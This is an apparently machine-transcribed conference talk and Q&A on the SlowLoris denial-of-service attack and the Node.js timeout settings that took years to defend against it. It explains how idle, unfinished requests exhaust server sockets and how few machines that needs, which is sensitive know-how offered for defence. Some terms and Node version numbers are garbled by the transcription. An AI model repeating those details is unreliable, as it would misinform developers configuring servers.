Web applications are commonly vulnerable to several Distributed Denial of Service attacks, sometimes in unexpected ways. An example is the SlowLoris attack, an exploit that leads to service interruption by simply sending the data to the server as slowest as possible. In this talk I will tell the tale of how it took almost 13 years for Node to be completely protected by SlowLoris attack. I will also show that sometimes prioritizing performance can lead to incorrect fixes that can result in a false sense of protection.
The tale of avoiding a time-based DDOS attack in Node.js
From:

Node Congress 2023
Transcription
I will promise I will change this title because it's definitely too long, but let's put to a short catchy sentence. Sometimes your worst enemy is just Zlores. You now don't believe me, but at the end of the talk, you actually will believe me and will be amazed on how this happened. First of all, let me slightly reintroduce myself. For people that ask me where do I come from, the little tiny dot there in the center of South Italy, and I can tell you that the rest of Italy does not acknowledge our existence. My region is completely forgotten. Don't ask me why, but as I also said, I'm a staff DX engineer at NearForm and co-founder and principal architect at Orama. What are these companies? NearForm is a professional services company, fully remote. We are always looking for new talent, so if you're interested, come say hi to me after this talk. We are 300 and counting, fully remote, and unfortunately, you cannot escape from us on npm. We have 1 billion monthly downloads on our packages, 8%, so unfortunately, you cannot escape. About Orama, we plan just to do one simple thing, search everywhere, wherever you can run javascript. We are trying to reinvent the text search industry, just using javascript and staying open source. Once again, if you're interested, come say hi to me later, to me or my co-founder Michele and Angela, we are outside. Let's get to the meat. Nowadays, we are using more and more web applications and they are very important for all our usage. They can range from very important topics like, I don't know, telemedicines, online banking, national security, or whatever, to very, what might be thought as trivial topics like social networks, messaging, and so forth. I say might be called trivial because if you think about accessibility and inclusion, for some kind of people like elderly and so forth, WhatsApp might be the only way to talk to their nephew. So if you have WhatsApp down, you cut them off from a very important part of their communication. So all these applications simply can never go down. That's not going to happen. Which brings to another problem, that we are always all vulnerable. No matter how smart you think you are, no matter how many people work for security in your company, remember that it's going to be 10 more people outside trying to waste your time and mess with your application and to bring them down. Unfortunately, they're always outnumbering you. And this brings to one category of attacks which is usually well known. Please raise your hand if you know about DDoS attacks. And raise your hand if you know DDoS attacks, the dead variant. Okay, pretty much the same people. So in short, a denial of service attack is the kind of attack where a network resource is maliciously made unavailable to the intended user. Now the application is not breached by the attacker, but is overwhelmed by requests. There is the distributed version, which is the DDoS attack, which is what I'm going to focus from now on, which is a variant where this malicious traffic comes from several resources across the web, which is much harder to fight for reasons that we will see in a bit. Now, up to a few years ago, it was a common understanding that in order to drive a DDoS attack, the attacker must use a lot of resources from several sources across the globe. Now please raise your hand if you think that this is still true, and in order to run a DDoS attack, you have to use a lot of resources. Okay, okay. That's kind of true and not, and I will show you in a bit why that's the case. Because first of all, let me introduce you to your real enemy for today. This is the most terrific animal I've ever seen in IT. This guy. This guy is terrifying. When I will tell you why, you will say, okay, this is amazing. So this is the Zoloris, and basically it's a very, very, very, very small, small and slow animal. By definition, it moves very slowly. If you know the movie Zootropolis, there is the DMV scene, if you know what I'm talking about. Think about something like that. That will kill you. That's exactly what we are going to talk about now, because we are focusing on an attack which was called the Zoloris attack. That is a DDoS attack, which uses, contrary to what you might think, a very minimal bandwidth, close to nothing, which is just amazing. This attack was created by Robert Hansen in 2009, and that's something I just added to what I found online when searching this attack. Technically speaking, it's not only HTTP. I don't know why, if you look online for the Zoloris attack, you only use its HTTP implementation, because of course HTTP is probably the most used protocol. But in my opinion, when I analyze how this attack works, this attack can be extended to any protocol that runs over TCP, and that has no good timeout handling. If you do like that, you can bring any server down. And remember that it takes a single server to keep everything down. Let's start from analyzing in HTTP how things usually work. So when we are talking about an HTTP server, usually what happens is that there is a client connecting to the server. So there is the solid black line. Then it sends a request, which is the solid, in this case, the solid red line, and receives a response, which is the solid green line. Usually that's the normal flow. We can assume for this example that each socket consumes the same amount of RAM and other system resources to the server. Usually that's the case, but depending on which media you use, might not really be the case. But we can assume it is. Then there is a second request that does the same. But by the time that second request arrives, we can assume that the first request has... Sorry, the first client has disconnected. I see your objection. That's not true for Keepalive, because of course a client can stay connected and eventually send multiple requests on the same socket. But just for the sake of example, let's say that the first client at some point disconnects. So over the course of the time, second, third, fourth, fifth client, we can assume that the number of resources and sockets on the server, forgetting about temporary spikes, are usually constant. It's usually constant. That's our assumption, which usually holds true. If you look at your graphs on any log watching application, you'll see that the network traffic is relatively stable. So that actually is the case. The thing is that one thing that you likely usually never consider is that retaining socket on the server is expensive, because you first get a file... I mean, you first get network handling at the operating system layer, which means that some RAM of your system is used just to keep that application open. Then there is the file system, if you are in UNIX, that will link that network resources to a file descriptor, because in the UNIX everything is a file descriptor. We know the rule. This file descriptor that is created will affect your process ULIMIT number. Please raise your hand if you know what ULIMIT is. Okay, let's answer. Okay. In short, ULIMIT is a system parameter that specifies how many file descriptors your process can open. Usually process starts with a pretty low limit, which is 1024, and it can be raised by the user to be infinite. The problem is that what infinite means? Infinite to the single process, but system-wide the number is still a finite number. So eventually your process can take all the possible file descriptor, but at some point, well, there will be no file descriptor for nobody, including your process. And that's a problem. Finally, when we exit the operating system layer, we get to the application layer. For instance, Node, in order to keep a socket, needs to have a lot of callbacks, streams and so forth, related to your single socket. Once again, a lot of RAM. At some point, this RAM will finish. We always talk about virtual RAM, but there is physical RAM that at some point will just finish. That's the problem. And then brings us to the slow-lorist attack. The slow-lorist attack is pretty unique because each client connects and never finishes the response. In this case, as you can see, the red line is dashed, and by dashed I mean incomplete request, so they never send the last byte. And as you can see, there is no green line because the server could never actually receive the full request and server response. Over the course of time, more and more clients keep connecting and never disconnect, and this leads to service interruption. Because at some point, the server will not be able to accept new connections due to lack of file descriptor, or RAM, or bot. What is the problem here? If you look at your logs in your monitoring system, you will see no bandwidth. You will probably only see a fall in the outgoing bandwidth because the server will not be able to respond anymore, but the incoming bandwidth will be close to nothing, so you can really not set any alarm because it's nearly impossible to distinguish whether nobody's connecting or somebody's connecting but never sending the data, which is a horrible mess. Which brings me to a very simple question. How do we stop it? And this is when things get horrible because, in short, first of all, if you're using Node or similar application, please don't put them directly in contact with the public. Always have a reverse proxy or api gate or something like that in front because these software are more suited for this job of preventing these kind of attacks. Node or similar tools are general purpose tools, so they're not suited for this thing. So don't do that. But if you have to for any reason, unfortunately, I can tell you that none of the strategies you can possibly implement will be accurate. The reason being, there are two main ways to stop a DDoS attack from happening. The first one is a temporary move, which is ban the offending IPs for a while. Of course, makes no sense because we all know how easy it is to spawn a new instance on any cloud and get a new IP. But for a temporary relief, this might work. Long term, you have to have a very good speed enforcement or timeout, which is usually the most easy and equivalent to implement. Timeout handling technique, which poses a problem about the inclusion, because when I say if you, for instance, say I consider all clients that are slower than five seconds to be attacking, you're cutting out people that have a poor network connection and are legit clients. So you must know your clients, you must know your application use case, and by that you can choose what is your threshold for timeout that you can eventually incrementally monitor and change. This basically will lead to a certain threshold of users that will cut out which are legit users and you have to know your risk, unfortunately. But you can never be 100% accurate. Now what about Node? How is Node handling this slow-release attack and how can we do that? First of all, Node has been partially completely unprotected up to 2018. Even though slow-release has been out since 2009, and so has Node, and Node from the very first version was including an HTTP server, it had not effective timeout handling. The only timeout handling available before version 10.14 was net.socket.timeout, which is the amount of time a socket can stay completely idle, which means not sending any byte, before getting shut down. That was the only timeout. In Node 10.14, HTTP server's address timeout was introduced, which basically established how much time each client has to send the entire request address. Now why only the request address? Because in Node we never deal, consume, timeout, or whatever with the body. That was an initial design that we delegate body handling to the application layer, which is express, fastify, whatever you want. Now raise your hand if you think that this framework implemented proper timeout handling logic. You've been in IT a long... Okay, I appreciate that. Okay, unfortunately that was a problem. So in Node 14.0, there was an initial protection, at least on the headers part, but the body was still left out, so basically was not effective as a protection. The situation even got worsened when we released Node 13.0.0 one year later, where we disabled the timeout I was speaking out earlier about the idling timeout. That timeout was disabled by default, rather than being enabled by default. The reason being, being more friendly to serverless environment that need long running connection, so therefore, usually idling connection. So we disabled that, and once again, we trust on the framework to properly implement timeout handling. Once again, I won't ask you to raise your hand again, but you know the idea. So unfortunately, there was no proper handling by the frameworks. fastify, Restify implement a proper fix, Coa and Express did not, which was an app that already implemented a proper fix. Coa and Express did not, and it was a big problem. Then one year later, in Node 14.0, we got a better protection, which was the HTTP server request timeout. As the name suggests, it is a way to enforce a complete timeout on the entire HTTP request. It was available on all active lines, but unfortunately, it was disabled by default. The reason being that it was introduced as a semantic version in minor change, so it could not be enabled by default, because of a backward incompatible change. So that was a problem. Are we safe? Raise your hand if you think yes. Okay, you know I work now. Okay, amazing. Amazing. We were almost protected. The countermeasures that we have back to Node 14.0 were loose, because custom configuration was needed in order to protect. I mean, you have to re-enable all the timers that have been disabled by default, unfortunately. And there was a prioritization of performance when implementing the check, that I will come back to in a minute. Basically, the problem was that the timeout was checked after receiving the next byte. So now, do we want to make a guess on why this logic might be flawed in case of slow lorries? Anyone? Okay. What? That's the point. That's a certain point. So it kind of works for a very fast attack, that works. But for slow attacks, slow lorries-like attacks, you never receive the next byte. So waiting for the next byte to check if you should have received it earlier makes little sense, right? But it was the fastest way to implement a proper timeout checking. Anyway, let's start small. Let's say we are on Node 16 and below. How do we protect your Node application in the right way? First of all, make sure that the socket cannot be idle. So re-enable http.server.timeout. Limit the time for each request, so enable http.server.requestTimeout. And also, re-enable adderTimeout with a lower value. That's the way to protect 16, 14, 12. Please update to at least 16. Do us a favor, because both of them are end of life. And this is an example, for instance. You can just copy those values, so two minutes for the socket to be idle, five minutes to receive the entire request, which is a lot, and adderTimeout, just a minute. This way, if your server can resist five minutes, it will resist the attack. That's the idea. I can tell you that with the release of Node 18.0.0, we are finally safe by default. Why is that? Because the requests are checked periodically. There is a new api that checks every certain seconds, by default it's 30 seconds, check all the sockets. So a connection list was implemented. Because before Node 18.0, we did not maintain a list of sockets connected to the HTTP server, so we could not make this kind of check. We implemented it in Node 18.0. And every 30 seconds, we check all the sockets, no matter if we have received new data or not, and we cut the expired one. Also, we have safer defaults. Easter egg, these were the defaults on Node 18. You can use a node before 18, but these also are the default on Node 18.0, finally, which makes us easier. And now Node 18.0 is protected by default against slow lorries. So we finally made it. We are finally secure on that. Take-home lessons, what we can learn from this. First of all, always think about security. data comes first, before performance. You can sacrifice performance, and eventually, if you do like this and basically change your mindset, you might even get performance gain for free. When I implement connection checking interval, I get a 2% improvement, totally unexpected. I was not even looking for that. Somehow, I got it. Don't ask me how. I never checked. I just was happy with that. Also, validate regularly what you're doing, because you might find code that another person has written in very good faith, but the implementation flaws or was just tired, and so you can always recheck what you're doing every time. And finally, one thing that I always like to do in my talks is to end with a very, very smart quote from someone else. In my case, I'm quoting William Safar, which says, never assume the obvious is true. When in my own words, I say, please, please, please use common sense everywhere. This thing is usually forgotten, and you know that. Use common sense in all your life, working and non-working. Questions in a bit, and thank you very much. That's it. People do think about security without necessarily the knowledge on how to implement it. You gave or implement practices towards it. You gave some take-homes, which were good starting points for thought processes you should establish. I'm curious if you see any common mitigations or so developers believe that may end up doing more damage than good. I mean, the one in which is not really a couple to security, but is coupled everywhere, which is this one single term, over-engineering. There's sometimes over-engineering stuff, and they might do harm or even completely kill performance. If you start over-engineering looking just for security or performance, you might kill the other, and that's when you're killing your application. If an application is secure, but is not usable, like you have to log in every five minutes, for instance, if we switch to the front-end, nobody's going to use it. So whether it's secure or fast doesn't matter anymore, because it makes, let's say, the UX unusable. So it's always to remember all the security, performance, usability. So there's a triangle that they usually think about just keeping a single, two out of three of the triangle. In this case, we have to try to keep all of them. That's the idea. Oh yeah, easy. Easy, right? At least we struggle. I'm not saying it's possible, but let's struggle to keep all the three vertex of the triangle. Excellent. We have quite a few questions. I will quickfire them in the time we have. How does Nginx protect your server from slow loris? To be honest, I have no idea, but I know it does. I guess the thing is that the only way to protect slow loris is proper timeout handling. So that's the only way. So I guess that Nginx has a better timeout handling, which is more suited for the job. The biggest issue is that you can't provide a complete software, so Nginx is just focused on that. And I assume that even now, or in the future, if there is no other way to protection now, Nginx will have a faster pipeline to get to a proper protection. Because for instance, in Node, we have to worry about HTTP and crypto at the same time. Nginx only focuses on HTTP, so it will be faster if new attacks come out to immediately protect from them. That's the idea. Yeah, awesome. Thank you. Is there a method to mitigate slow loris attacks for WebSockets? For the same. In the case of WebSockets, that's the same technique. Of course, you can't really enforce, probably you have to enforce higher timeouts, because it might be that the WebSocket is not used for a while because you're just idling. But for instance, when a new message starts, you enforce hard timeout. Now the message has to reach the other end, eventually, just at the load protocol level. And of course, you enforce an overall, eventually very long timeout for idling Socket. So let's say after an hour, you can assume that the client is not doing anything, shut them down. Maybe an hour is too much. But once again, know your application is the key there. Yeah, there's a bunch of questions about magic numbers. We'll get to those in due course. But first, the next question. Are there any similar major vulnerabilities still hurting us, even with the latest Node version? Not that I'm aware of. Might be, but at the moment I'm not aware of. I might be wrong, so don't trust me. Double check. Don't trust me. No, no, I don't trust myself, Fox. So double check whatever I see. Kind of similar on the other side, is slow-loader still the most common DDoS attack nowadays? Or are there other forms of popular attack that people should be aware of and mitigate for? You can basically switch the attacks on two sides. Slow-loaders, which use minimal bandwidth. And there are several kinds of attacks that just hammer your server, which just maybe eventually connection attempts or just start sending traffic, but too much traffic, and so forth. These are the major two categories. You can either be slow or fast. If you are average, you're just a regular request, doesn't matter. That's probably the response to that. Audience, question. I said Nginx. Is it Nginx or Nginx, I've always said Nginx. Nods, nods. Nods. Excellent. Thank you so much, team. So should we keep the safety measures that you recommended, Node, even when we're running it behind an Nginx, you know, setup, for example? Yes, absolutely. Absolutely. The reason being is that, as I told you, I'm not sure whether Nginx protects from slow-loaders, so why remove one of protection, additional layer protection. Most of the times, these timeouts will never throw in, so you don't have any issue. So that's absolutely fine. It will make no harm to leave them open, especially because all the timeouts that I showed up earlier, previously were implemented with different setTimeout and setInterval internally in Node. Now they're only implemented with just the regular temporary timeout. And if a socket finishes your basic request before the timeout, the interval checking goes by, it will not even be checked, so you get that for free. So there's no reason disabling it now. In Node 18, if you are in Node 16, probably you might think twice, but since these timeouts are so high, they will never go off, so you're probably fine. But advice, Node 18 is going LTS in October. Update. You know what I'm saying. Update. We have a couple of questions which are kind of similar. I'm going to combine them in the interest of time. I'll read both in full though. How big are the performance impacts of checking all requests in Node 18 plus? Is there a golden value for checking for the checking interval? And a similar question, one minute seems like a really high time for a header timeout. In your experience, what could be good numbers for real-world examples? It is a huge timeout. That's by design. Remember that Nodes is a general purpose tool, so we have no idea what you're doing in your application. We set a default that most likely will not impact people and will keep them safe. But if you know that your clients are very fast, you can lower it even to 10 seconds. One additional thing that I will have to add to this is that know your application and know your clients. In this case, I'm not talking about know your clients for marketing the health out of them. It's on the technical side. If you know that your clients are desktop-only clients, you can assume they have fast connection, for instance. If you know that they are mobile-only, you must have higher timeouts because their connection might be sloppy sometimes. Of course, our timeouts are very generous that will probably not impact anybody, but you should never lower down. Thank you. A couple more. This is ambiguous. It could be the attack or the defense. How does this work with handling file uploads and multi-platform data? Know your application. If you know that you're uploading 5GB, allow for an hour to timeout. Once again, this timeout, of course, won't work if you have to upload a 10GB file over a 3G network. It can never work. If you know that your user must do that, let's allow them to have higher timeouts. For instance, I don't know how S3 works, but I'm pretty sure that the S3 upload endpoint has higher timeouts than the download one, for sure. Otherwise, it will never work. It's just a common logon. Once again, use common sense, folks. That's the best I can give you. Last question, Ian. Usually, there's a limit on the number of allowed simultaneous connections to a server across the board. So, does Slowloader still require a distributed network in order to work? Yes. But the thing is that... well, not strictly. Let's put it this way. If your client is more powerful than the target server, you might just need a single client. So if the server goes down in terms of RAM and sockets, before your client goes out of sockets, which we are talking about the same IPs like 65K, if the server goes down due to lack of RAM or file descriptor, before you end up with the sockets on your client, you just need a single client. Depends on what you're attacking and with what you're attacking the target. Yeah, but by nature of it, it's who runs out of resources first. You would have more nodes in order to... But it's pretty easy. Because let's say, if the server is just a regular server, with the new laptop, for instance, on the server we have the AMD CPUs, on the client we have the M.2 which are very powerful. If you have a good network, maybe 2 M.2 MacBook can take down an AMD machine. Depends on how the machine is configured. Depends on the environment. There is no golden rule. Usually, typically, it takes a lot of resources. But consider the network is not one of these resources. So you can just put up EC2 machines, let them start the sockets and don't do anything. That's it. Eventually, I hope that Amazon will notice that you're building sockets without doing anything, but that's another topic. That's completely another topic. Can we all give a massive round of applause to Paolo? That was absolutely fascinating. Thank you so, so much. Thank you very much. Thank you so much.